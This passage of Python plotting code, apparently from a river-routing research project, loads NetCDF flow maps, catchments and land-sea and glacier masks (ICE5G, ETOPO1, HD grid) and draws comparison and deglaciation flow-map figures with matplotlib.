"corrected_orog_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless_"
"downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
additional_matches_list_filename=\
'additional_matches_ice5g_10min.txt',
catchment_and_outflows_mods_list_filename='catch_and_outflow_mods_ice5g_10min.txt',
super_fine_orog_filename="ETOPO1_Ice_c_gmt4.nc",
super_fine_data_flowmap_filename=
"flowmap_etopo1_data_ALG4_sinkless_20160603_112520.nc",
flip_super_fine_orog=True,
rotate_super_fine_orog=False,
select_only_rivers_in="North America",
super_fine_orog_grid_type='LatLong1min',
grid_type='HD',data_original_scale_grid_type='LatLong10min')
def Compare_Corrected_HD_Rdirs_And_Etopo1_ALG4_sinkless_directly_upscaled_fields(self):
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field = os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows_etopo1_data_ALG4_sinkless_upscale_riverflows_and_river_mouth_flows_20160503_231022.nc")
self.OutFlowComparisonPlotHelpers(corrected_hd_rdirs_rmouthoutflow_file,
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field,
"flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
"upscaled/flowmap_etopo1_data_ALG4_sinkless_upscale_riverflows_"
"and_river_mouth_flows_20160503_231022.nc",
"rivdir_vs_1_9_data_from_stefan.nc",
flip_data_field=True,
grid_type='HD')
def Compare_Corrected_HD_Rdirs_And_Etopo1_ALG4_true_sinks_directly_upscaled_fields(self):
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field = os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows__etopo1_data_ALG4_sinkless_upscale_riverflows_and_river_mouth_flows_20160603_114215.nc")
self.OutFlowComparisonPlotHelpers(corrected_hd_rdirs_rmouthoutflow_file,
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field,
"flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
"upscaled/flowmap__etopo1_data_ALG4_sinkless_upscale_riverflows_"
"and_river_mouth_flows_20160603_114215.nc",
"rivdir_vs_1_9_data_from_stefan.nc",
flip_data_field=True,
ref_catchment_filename=\
"catchmentmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
data_catchment_filename=\
"catchmentmap_unsorted_etopo1_data_ALG4_sinkless_20160603_112520.nc",
data_original_scale_flow_map_filename=\
"flowmap_etopo1_data_ALG4_sinkless_20160603_112520.nc",
grid_type='HD',data_original_scale_grid_type='LatLong1min')
    def Compare_Upscaled_Rdirs_vs_Directly_Upscaled_fields_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k(self):
        """Compare outflows from upscaled rdirs vs directly upscaled ICE5G ALG4 flow fields.

        Both datasets come from the ICE5G ALG4 sinkless, downscaled land-sea
        mask, present-day (0k) setup: one generated by upscaling the river
        directions first (20161031 generation), the other by upscaling the
        river flows directly (20160930 generation). Catchment maps, orography
        files and a catchment/outflow modifications list are supplied so the
        helper can match outflows; both fields are flipped and rotated into a
        common orientation, and area-based matching parameters are used.
        """
        # Timestamps selecting which generation of each dataset to load
        data_creation_datetime_directly_upscaled="20160930_001057"
        data_creation_datetime_rdirs_upscaled = "20161031_113238"
        ice5g_ALG4_sinkless_all_points_0k_river_flow_dir_upsc_field = os.path.join(self.rmouth_outflow_data_directory,
                                                                                   "rmouthflows_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs_{0}_updated.nc"\
                                                                                   .format(data_creation_datetime_rdirs_upscaled))
        ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field = os.path.join(self.rmouth_outflow_data_directory,
                                                                        "upscaled/rmouthflows_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc"\
                                                                        .format(data_creation_datetime_directly_upscaled))
        self.OutFlowComparisonPlotHelpers(ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field,
                                          ice5g_ALG4_sinkless_all_points_0k_river_flow_dir_upsc_field,
                                          "upscaled/flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
                                          format(data_creation_datetime_directly_upscaled),
                                          "flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs_{0}_updated.nc".\
                                          format(data_creation_datetime_rdirs_upscaled),
                                          "generated/upscaled/"
                                          "upscaled_rdirs_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs_{0}_updated.nc".\
                                          format(data_creation_datetime_rdirs_upscaled),
                                          flip_ref_field=True,
                                          rotate_ref_field=True,
                                          flip_data_field=True,
                                          rotate_data_field=True,
                                          ref_orog_filename=\
                                          "topo_hd_vs1_9_data_from_stefan.nc",
                                          data_orog_original_scale_filename=\
                                          "generated/corrected/"
                                          "corrected_orog_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".format(data_creation_datetime_directly_upscaled),
                                          data_catchment_filename=\
                                          "catchmentmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs_{0}_updated.nc".\
                                          format(data_creation_datetime_rdirs_upscaled),
                                          ref_catchment_filename=
                                          "upscaled/catchmentmap_unsorted_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
                                          format(data_creation_datetime_directly_upscaled),
                                          data_catchment_original_scale_filename=\
                                          "catchmentmap_unsorted_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
                                          format(data_creation_datetime_directly_upscaled),
                                          data_original_scale_flow_map_filename=\
                                          "flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
                                          format(data_creation_datetime_directly_upscaled),
                                          swap_ref_and_data_when_finding_labels=True,
                                          catchment_and_outflows_mods_list_filename=\
                                          "catch_and_outflow_mods_ice5g_10min_directly_upscaled_rdirs_vs_indirectly_upscaled_data.txt",
                                          matching_parameter_set='area',
                                          grid_type='HD',data_original_scale_grid_type='LatLong10min')
class FlowMapPlots(Plots):
    """A general base class for flow map plots.

    Provides the data-directory layout shared by all flow-map plotting
    methods; subclasses and methods locate their input files relative to the
    directories set up in the constructor.
    """

    # Subdirectory names (relative to self.hd_data_path) for each input type
    flow_maps_path_extension = 'flowmaps'
    ls_masks_extension = 'lsmasks'
    hdpara_extension = 'hdfiles'
    orography_extension = 'orographys'
    catchments_extension = 'catchmentmaps'
    def __init__(self,save,color_palette_to_use='default'):
        """Class Constructor.

        Arguments:
        save: bool; whether plots should be saved (passed to the Plots base)
        color_palette_to_use: str; name of the color palette to use
        """
        super(FlowMapPlots,self).__init__(save,color_palette_to_use)
        # Resolve the concrete data directories from the base path plus the
        # class-level subdirectory names above
        self.flow_maps_data_directory = os.path.join(self.hd_data_path,self.flow_maps_path_extension)
        self.ls_masks_data_directory= os.path.join(self.hd_data_path,self.ls_masks_extension)
        self.hdpara_directory = os.path.join(self.hd_data_path,self.hdpara_extension)
        self.orography_directory = os.path.join(self.hd_data_path,self.orography_extension)
        self.catchments_directory = os.path.join(self.hd_data_path,self.catchments_extension)
def FourFlowMapSectionsFromDeglaciation(self,time_one=14000,time_two=13600,time_three=12700,time_four=12660):
""" """
flowmap_one_filename = os.path.join(self.flow_maps_data_directory,
"30min_flowtocell_pmu0171a_{}.nc".format(time_one))
flowmap_two_filename = os.path.join(self.flow_maps_data_directory,
"30min_flowtocell_pmu0171b_{}.nc".format(time_two))
flowmap_three_filename = os.path.join(self.flow_maps_data_directory,
"30min_flowtocell_pmu0171b_{}.nc".format(time_three))
flowmap_four_filename = os.path.join(self.flow_maps_data_directory,
"30min_flowtocell_pmu0171b_{}.nc".format(time_four))
catchments_one_filename = os.path.join(self.catchments_directory,
"30min_catchments_pmu0171a_{}.nc".format(time_one))
catchments_two_filename = os.path.join(self.catchments_directory,
"30min_catchments_pmu0171b_{}.nc".format(time_two))
catchments_three_filename = os.path.join(self.catchments_directory,
"30min_catchments_pmu0171b_{}.nc".format(time_three))
catchments_four_filename = os.path.join(self.catchments_directory,
"30min_catchments_pmu0171b_{}.nc".format(time_four))
lsmask_one_filename = os.path.join(self.hdpara_directory,
"hdpara_{}k.nc".format(time_one))
lsmask_two_filename = os.path.join(self.hdpara_directory,
"hdpara_{}k.nc".format(time_two))
lsmask_three_filename = os.path.join(self.hdpara_directory,
"hdpara_{}k.nc".format(time_three))
lsmask_four_filename = os.path.join(self.hdpara_directory,
"hdpara_{}k.nc".format(time_four))
glac_mask_one_filename = os.path.join(self.orography_directory,
"glac01_{}.nc".format(time_one))
glac_mask_two_filename = os.path.join(self.orography_directory,
"glac01_{}.nc".format(time_two))
glac_mask_three_filename = os.path.join(self.orography_directory,
"glac01_{}.nc".format(time_three))
glac_mask_four_filename = os.path.join(self.orography_directory,
"glac01_{}.nc".format(time_four))
flowmap_one = iodriver.load_field(flowmap_one_filename,
file_type=iodriver.get_file_extension(flowmap_one_filename),
field_type='Generic',
grid_type='HD').get_data()
lsmask_one = iodriver.load_field(lsmask_one_filename,
file_type=iodriver.get_file_extension(lsmask_one_filename),
field_type='Generic',
fieldname='FLAG',
grid_type='HD').get_data().astype(np.int32)
glac_mask_one = iodriver.load_field(glac_mask_one_filename,
file_type=iodriver.get_file_extension(glac_mask_one_filename),
field_type='Generic',
fieldname='glac',
grid_type='LatLong10min')
glac_mask_hd_one = utilities.upscale_field(glac_mask_one,"HD",'Sum',
output_grid_kwargs={},
scalenumbers=True)
glac_mask_hd_one.flip_data_ud()
glac_mask_hd_one.rotate_field_by_a_hundred_and_eighty_degrees()
glac_mask_hd_one = glac_mask_hd_one.get_data()
catchments_one = iodriver.load_field(catchments_one_filename,
file_type=iodriver.get_file_extension(catchments_one_filename),
field_type='Generic',
grid_type='HD').get_data()
flowmap_two = iodriver.load_field(flowmap_two_filename,
file_type=iodriver.get_file_extension(flowmap_two_filename),
field_type='Generic',
grid_type='HD').get_data()
lsmask_two = iodriver.load_field(lsmask_two_filename,
file_type=iodriver.get_file_extension(lsmask_two_filename),
field_type='Generic',
fieldname='FLAG',
grid_type='HD').get_data().astype(np.int32)
glac_mask_two = iodriver.load_field(glac_mask_two_filename,
file_type=iodriver.get_file_extension(glac_mask_two_filename),
field_type='Generic',
fieldname='glac',
grid_type='LatLong10min')
glac_mask_hd_two = utilities.upscale_field(glac_mask_two,"HD",'Sum',
output_grid_kwargs={},
scalenumbers=True)
glac_mask_hd_two.flip_data_ud()
glac_mask_hd_two.rotate_field_by_a_hundred_and_eighty_degrees()
glac_mask_hd_two = glac_mask_hd_two.get_data()
catchments_two = iodriver.load_field(catchments_two_filename,
file_type=iodriver.get_file_extension(catchments_two_filename),
field_type='Generic',
grid_type='HD').get_data()
flowmap_three = iodriver.load_field(flowmap_three_filename,
file_type=iodriver.get_file_extension(flowmap_three_filename),
field_type='Generic',
grid_type='HD').get_data()
lsmask_three = iodriver.load_field(lsmask_three_filename,
file_type=iodriver.get_file_extension(lsmask_three_filename),
field_type='Generic',
fieldname='FLAG',
grid_type='HD').get_data().astype(np.int32)
glac_mask_three = iodriver.load_field(glac_mask_three_filename,
file_type=iodriver.get_file_extension(glac_mask_three_filename),
field_type='Generic',
fieldname='glac',
grid_type='LatLong10min')
glac_mask_hd_three = utilities.upscale_field(glac_mask_three,"HD",'Sum',
output_grid_kwargs={},
scalenumbers=True)
glac_mask_hd_three.flip_data_ud()
glac_mask_hd_three.rotate_field_by_a_hundred_and_eighty_degrees()
glac_mask_hd_three = glac_mask_hd_three.get_data()
catchments_three = iodriver.load_field(catchments_three_filename,
file_type=iodriver.get_file_extension(catchments_three_filename),
field_type='Generic',
grid_type='HD').get_data()
flowmap_four = iodriver.load_field(flowmap_four_filename,
file_type=iodriver.get_file_extension(flowmap_four_filename),
field_type='Generic',
grid_type='HD').get_data()
lsmask_four = iodriver.load_field(lsmask_four_filename,
file_type=iodriver.get_file_extension(lsmask_four_filename),
field_type='Generic',
fieldname='FLAG',
grid_type='HD').get_data().astype(np.int32)
glac_mask_four = iodriver.load_field(glac_mask_four_filename,
file_type=iodriver.get_file_extension(glac_mask_four_filename),
field_type='Generic',
fieldname='glac',
grid_type='LatLong10min')
glac_mask_hd_four = utilities.upscale_field(glac_mask_four,"HD",'Sum',
output_grid_kwargs={},
scalenumbers=True)
catchments_four = iodriver.load_field(catchments_four_filename,
file_type=iodriver.get_file_extension(catchments_four_filename),
field_type='Generic',
grid_type='HD').get_data()
glac_mask_hd_four.flip_data_ud()
glac_mask_hd_four.rotate_field_by_a_hundred_and_eighty_degrees()
glac_mask_hd_four = glac_mask_hd_four.get_data()
bounds=[0,150,60,265]
fig = plt.figure(figsize=(14,10))
gs = gridspec.GridSpec(2,3,width_ratios=[4,4,1])
ax1 = plt.subplot(gs[0,0])
ax2 = plt.subplot(gs[0,1])
ax3 = plt.subplot(gs[1,0])
ax4 = plt.subplot(gs[1,1])
cax = plt.subplot(gs[:,2])
rc_pts.simple_thresholded_data_only_flowmap(ax1,flowmap_one,lsmask_one,threshold=75,
glacier_mask=glac_mask_hd_one,
catchments=catchments_one,
catchnumone=4,
catchnumtwo=30,
catchnumthree=20,
bounds=bounds,
cax = cax,
colors=self.colors)
ax1.set_title("{} BP".format(time_one))
rc_pts.simple_thresholded_data_only_flowmap(ax2,flowmap_two,lsmask_two,threshold=75,
glacier_mask=glac_mask_hd_two,
catchments=catchments_two,
catchnumone=4,
catchnumtwo=30,
catchnumthree=51,
bounds=bounds,
colors=self.colors)
ax2.set_title("{} BP".format(time_two))
rc_pts.simple_thresholded_data_only_flowmap(ax3,flowmap_three,lsmask_three,threshold=75,
glacier_mask=glac_mask_hd_three,
catchments=catchments_three,
catchnumone=3,
catchnumtwo=21,
catchnumthree=8,
bounds=bounds,
colors=self.colors)
ax3.set_title("{} BP".format(time_three))
rc_pts.simple_thresholded_data_only_flowmap(ax4,flowmap_four,lsmask_four,threshold=75,
glacier_mask=glac_mask_hd_four,
catchments=catchments_four,
catchnumone=11,
catchnumtwo=7,
catchnumthree=8,
bounds=bounds,
colors=self.colors)
ax4.set_title("{} BP".format(time_four))
gs.tight_layout(fig,rect=(0,0.1,1,1))
def SimpleFlowMapPlotHelper(self,filename,grid_type,log_max=4):
"""Help produce simple flow maps"""
flowmap_object = iodriver.load_field(filename,
file_type=iodriver.get_file_extension(filename),
field_type='Generic',
grid_type=grid_type)
flowmap = flowmap_object.get_data()
plt.figure()
plt.subplot(111)
if log_max == 0:
log_max = math.log(np.amax(flowmap))
levels = np.logspace(0,log_max,num=50)
#ctrs = plt.contourf(flowmap,levels=levels,norm=colors.LogNorm())
#plt.contourf(flowmap,levels=levels,norm=colors.LogNorm())
plt.contourf(flowmap,levels=levels)
#cbar = plt.colorbar(ctrs)
cbar = plt.colorbar()
cbar.ax.set_ylabel('Number of cells flowing to cell')
pts.remove_ticks()
if self.save:
#plt.savefig('')
pass
def FlowMapTwoColourComparisonHelper(self,ref_filename,data_filename,lsmask_filename=None,
grid_type='HD',minflowcutoff=100,flip_data=False,
rotate_data=False,flip_ref=False,rotate_ref=False,
lsmask_has_same_orientation_as_ref=True,
invert_ls_mask=False,
first_datasource_name="Reference",
second_datasource_name="Data",
add_title=True,**kwargs):
"""Help compare two two-colour flow maps"""
flowmap_ref_field = iodriver.load_field(ref_filename,
file_type=iodriver.get_file_extension(ref_filename),
field_type='Generic',
grid_type=grid_type,**kwargs)
flowmap_data_field = iodriver.load_field(data_filename,
file_type=iodriver.get_file_extension(data_filename),
field_type='Generic',
grid_type=grid_type,**kwargs)
if lsmask_filename:
lsmask_field = iodriver.load_field(lsmask_filename,
file_type=iodriver.get_file_extension(lsmask_filename),
field_type='Generic', grid_type=grid_type,**kwargs)
if flip_data:
flowmap_data_field.flip_data_ud()
if rotate_data:
flowmap_data_field.rotate_field_by_a_hundred_and_eighty_degrees()
if flip_ref:
flowmap_ref_field.flip_data_ud()
if lsmask_filename and lsmask_has_same_orientation_as_ref:
lsmask_field.flip_data_ud()
if rotate_ref:
flowmap_ref_field.rotate_field_by_a_hundred_and_eighty_degrees()
if lsmask_filename and lsmask_has_same_orientation_as_ref:
lsmask_field.rotate_field_by_a_hundred_and_eighty_degrees()
if invert_ls_mask:
lsmask_field.invert_data()
if lsmask_filename:
lsmask = lsmask_field.get_data()
flowmap_ref_field = flowmap_ref_field.get_data()
flowmap_data_field = flowmap_data_field.get_data()
plt.figure(figsize=(20,8))
ax = plt.subplot(111)
fmp_pts.make_basic_flowmap_comparison_plot(ax,flowmap_ref_field,flowmap_data_field,minflowcutoff,
first_datasource_name,second_datasource_name,lsmask,
colors=self.colors,add_title=add_title)
def FlowMapTwoColourPlotHelper(self,filename,lsmask_filename=None,grid_type='HD',
minflowcutoff=100,flip_data=False,flip_mask=False,
**kwargs):
"""Help produce two colour flow maps"""
flowmap_object = iodriver.load_field(filename,
file_type=iodriver.get_file_extension(filename),
field_type='Generic',
grid_type=grid_type,**kwargs)
lsmask_field = iodriver.load_field(lsmask_filename,
file_type=iodriver.get_file_extension(lsmask_filename),
field_type='Generic', grid_type=grid_type,**kwargs)
if flip_data:
flowmap_object.flip_data_ud()
if flip_mask:
lsmask_field.flip_data_ud()
lsmask = lsmask_field.get_data()
flowmap = flowmap_object.get_data()
plt.figure()
plt.subplot(111)
flowmap[flowmap < minflowcutoff] = 1
flowmap[flowmap >= minflowcutoff] = 2
if lsmask is not None:
flowmap[lsmask == 1] = 0
cmap = mpl.colors.ListedColormap(['blue','peru','black'])
bounds = list(range(4))
norm = mpl.colors.BoundaryNorm(bounds,cmap.N)
plt.imshow(flowmap,cmap=cmap,norm=norm,interpolation="none")
plt.title('Cells with cumulative flow greater than or equal to {0}'.format(minflowcutoff))
    def Etopo1FlowMap(self):
        """Simple flow map of the ETOPO1-derived ALG4 sinkless river directions (1 minute grid)."""
        filename=os.path.join(self.flow_maps_data_directory,
                              'flowmap_etopo1_data_ALG4_sinkless_20160603_114215.nc')
        self.SimpleFlowMapPlotHelper(filename,'LatLong1min')
    def Etopo1FlowMap_two_colour(self):
        """Two-colour flow map of the ETOPO1 ALG4 sinkless data at 1 minute resolution."""
        filename=os.path.join(self.flow_maps_data_directory,
                              'flowmap_etopo1_data_ALG4_sinkless_20160603_112520.nc')
        lsmask_filename = os.path.join(self.ls_masks_data_directory,'generated',
                                       'ls_mask_etopo1_data_ALG4_sinkless_20160603_112520.nc')
        self.FlowMapTwoColourPlotHelper(filename,lsmask_filename=lsmask_filename,
                                        grid_type='LatLong1min',
                                        minflowcutoff=25000,flip_data=True,flip_mask=True)
    def Etopo1FlowMap_two_colour_directly_upscaled_fields(self):
        """Two-colour flow map of the ETOPO1 ALG4 data directly upscaled to the HD grid."""
        # NOTE(review): the double underscore in 'flowmap__etopo1' is
        # presumably part of the generated file's actual name - verify before
        # "correcting" it
        filename=os.path.join(self.flow_maps_data_directory,'upscaled',
                              'flowmap__etopo1_data_ALG4_sinkless_upscale_riverflows'
                              '_and_river_mouth_flows_20160603_114215.nc')
        lsmask_filename = os.path.join(self.ls_masks_data_directory,'generated',
                                       'ls_mask_extract_ls_mask_from_corrected_'
                                       'HD_rdirs_20160504_142435.nc')
        self.FlowMapTwoColourPlotHelper(filename,lsmask_filename=lsmask_filename,
                                        grid_type='HD',
                                        minflowcutoff=50,flip_data=True,flip_mask=False)
    def Corrected_HD_Rdirs_FlowMap_two_colour(self):
        """Two-colour flow map of the manually corrected HD river directions."""
        filename=os.path.join(self.flow_maps_data_directory,
                              'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
        lsmask_filename = os.path.join(self.ls_masks_data_directory,'generated',
                                       'ls_mask_extract_ls_mask_from_corrected_'
                                       'HD_rdirs_20160504_142435.nc')
        self.FlowMapTwoColourPlotHelper(filename,lsmask_filename=lsmask_filename,
                                        grid_type='HD',
                                        minflowcutoff=25,flip_data=False,flip_mask=False)
    def Corrected_HD_Rdirs_And_Etopo1_ALG4_sinkless_directly_upscaled_fields_FlowMap_comparison(self):
        """Two-colour comparison: corrected HD rdirs vs directly upscaled ETOPO1 ALG4 sinkless flow map."""
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
        data_filename=os.path.join(self.flow_maps_data_directory,'upscaled',
                                   'flowmap_etopo1_data_ALG4_sinkless_upscale_riverflows'
                                   '_and_river_mouth_flows_20160503_231022.nc')
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_extract_ls_mask_from_corrected_"
                                     "HD_rdirs_20160504_142435.nc")
        self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
                                              data_filename=data_filename,
                                              lsmask_filename=lsmask_filename,
                                              grid_type='HD',
                                              minflowcutoff=75,
                                              flip_data=True)
    def Corrected_HD_Rdirs_And_Etopo1_ALG4_true_sinks_directly_upscaled_fields_FlowMap_comparison(self):
        """Two-colour comparison: corrected HD rdirs vs directly upscaled ETOPO1 ALG4 true-sinks flow map."""
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
        # NOTE(review): the double underscore in 'flowmap__etopo1' is
        # presumably part of the generated file's actual name
        data_filename=os.path.join(self.flow_maps_data_directory,'upscaled',
                                   'flowmap__etopo1_data_ALG4_sinkless_upscale_riverflows'
                                   '_and_river_mouth_flows_20160603_114215.nc')
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_extract_ls_mask_from_corrected_"
                                     "HD_rdirs_20160504_142435.nc")
        self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
                                              data_filename=data_filename,
                                              lsmask_filename=lsmask_filename,
                                              grid_type='HD',
                                              minflowcutoff=50,
                                              flip_data=True)
    def Corrected_HD_Rdirs_And_ICE5G_data_ALG4_sinkless_0k_directly_upscaled_fields_FlowMap_comparison(self):
        """Two-colour comparison: corrected HD rdirs vs directly upscaled ICE5G ALG4 sinkless 0k flow map."""
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
        data_filename=os.path.join(self.flow_maps_data_directory,'upscaled',
                                   "flowmap_ICE5G_data_ALG4_sinkless_0k_upscale_riverflows"
                                   "_and_river_mouth_flows_20160502_163323.nc")
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_extract_ls_mask_from_corrected_"
                                     "HD_rdirs_20160504_142435.nc")
        self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
                                              data_filename=data_filename,
                                              lsmask_filename=lsmask_filename,
                                              grid_type='HD',
                                              minflowcutoff=75,
                                              flip_data=True,
                                              rotate_data=True)
    def Corrected_HD_Rdirs_And_ICE5G_data_ALG4_true_sinks_0k_directly_upscaled_fields_FlowMap_comparison(self):
        """Two-colour comparison: corrected HD rdirs vs directly upscaled ICE5G ALG4 true-sinks 0k flow map."""
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
        data_filename=os.path.join(self.flow_maps_data_directory,'upscaled',
                                   "flowmap__ICE5G_data_ALG4_sinkless_0k_upscale_riverflows"
                                   "_and_river_mouth_flows_20160603_112520.nc")
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_extract_ls_mask_from_corrected_"
                                     "HD_rdirs_20160504_142435.nc")
        self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
                                              data_filename=data_filename,
                                              lsmask_filename=lsmask_filename,
                                              grid_type='HD',
                                              minflowcutoff=75,
                                              flip_data=True,
                                              rotate_data=True)
    def Corrected_HD_Rdirs_And_ICE5G_data_ALG4_corr_orog_0k_directly_upscaled_fields_FlowMap_comparison(self):
        """Two-colour comparison: corrected HD rdirs vs upscaled ICE5G ALG4 corrected-orography 0k flow map."""
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
        data_filename=os.path.join(self.flow_maps_data_directory,'upscaled',
                                   "flowmap_ICE5G_data_ALG4_sinkless_0k_20160802_112138.nc")
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_extract_ls_mask_from_corrected_"
                                     "HD_rdirs_20160504_142435.nc")
        self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
                                              data_filename=data_filename,
                                              lsmask_filename=lsmask_filename,
                                              grid_type='HD',
                                              minflowcutoff=75,
                                              flip_data=True,
                                              rotate_data=True)
    def Corrected_HD_Rdirs_And_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k_directly_upscaled_fields_FlowMap_comparison(self):
        """Two-colour comparison: corrected HD rdirs vs upscaled ICE5G ALG4 downscaled-lsmask 0k flow map."""
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
        data_filename=os.path.join(self.flow_maps_data_directory,'upscaled',
                                   "flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_20160919_090154.nc")
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_extract_ls_mask_from_corrected_"
                                     "HD_rdirs_20160504_142435.nc")
        self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
                                              data_filename=data_filename,
                                              lsmask_filename=lsmask_filename,
                                              grid_type='HD',
                                              minflowcutoff=75,
                                              flip_data=True,
                                              rotate_data=True)
    def Corrected_HD_Rdirs_And_ICE5G_data_ALG4_no_true_sinks_corr_orog_0k_directly_upscaled_fields_FlowMap_comparison(self):
        """Two-colour comparison: corrected HD rdirs vs upscaled ICE5G ALG4 no-true-sinks 0k flow map."""
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
        data_filename=os.path.join(self.flow_maps_data_directory,'upscaled',
                                   "flowmap_ICE5G_data_ALG4_sinkless_no_true_sinks_0k_20160718_114758.nc")
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_extract_ls_mask_from_corrected_"
                                     "HD_rdirs_20160504_142435.nc")
        self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
                                              data_filename=data_filename,
                                              lsmask_filename=lsmask_filename,
                                              grid_type='HD',
                                              minflowcutoff=75,
                                              flip_data=True,
                                              rotate_data=True)
    def Corrected_HD_Rdirs_And_ICE5G_HD_as_data_ALG4_true_sinks_0k_directly_upscaled_fields_FlowMap_comparison(self):
        """Two-colour comparison: corrected HD rdirs vs ICE5G-as-HD ALG4 true-sinks 0k flow map (no reorientation)."""
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
        data_filename=os.path.join(self.flow_maps_data_directory,
                                   "flowmap_ICE5G_as_HD_data_ALG4_sinkless_all_points_0k_20160608_184931.nc")
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_extract_ls_mask_from_corrected_"
                                     "HD_rdirs_20160504_142435.nc")
        self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
                                              data_filename=data_filename,
                                              lsmask_filename=lsmask_filename,
                                              grid_type='HD',
                                              minflowcutoff=75,
                                              flip_data=False,
                                              rotate_data=False)
    def Upscaled_Rdirs_vs_Directly_Upscaled_fields_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison(self):
        """Two-colour comparison: flow map from upscaled rdirs vs directly upscaled flow map (ICE5G 0k)."""
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  'flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs_20161031_113238_updated.nc')
        data_filename=os.path.join(self.flow_maps_data_directory,'upscaled',
                                   "flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_20160930_001057.nc")
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_extract_ls_mask_from_corrected_"
                                     "HD_rdirs_20160504_142435.nc")
        self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
                                              data_filename=data_filename,
                                              lsmask_filename=lsmask_filename,
                                              grid_type='HD',
                                              minflowcutoff=50,
                                              flip_data=True,
                                              rotate_data=True,
                                              flip_ref=True,
                                              rotate_ref=True,
                                              lsmask_has_same_orientation_as_ref=False)
    def Upscaled_Rdirs_vs_Corrected_HD_Rdirs_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison(self):
        """Two-colour comparison: corrected HD rdirs flow map vs flow map from upscaled rdirs (ICE5G 0k)."""
        ref_filename=os.path.join(self.flow_maps_data_directory,
                                  'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
        data_filename=os.path.join(self.flow_maps_data_directory,
                                   'flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs_20161031_113238_updated.nc')
        lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
                                     "ls_mask_extract_ls_mask_from_corrected_"
                                     "HD_rdirs_20160504_142435.nc")
        self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
                                              data_filename=data_filename,
                                              lsmask_filename=lsmask_filename,
                                              grid_type='HD',
                                              minflowcutoff=60,
                                              flip_data=True,
                                              rotate_data=True,
                                              flip_ref=False,
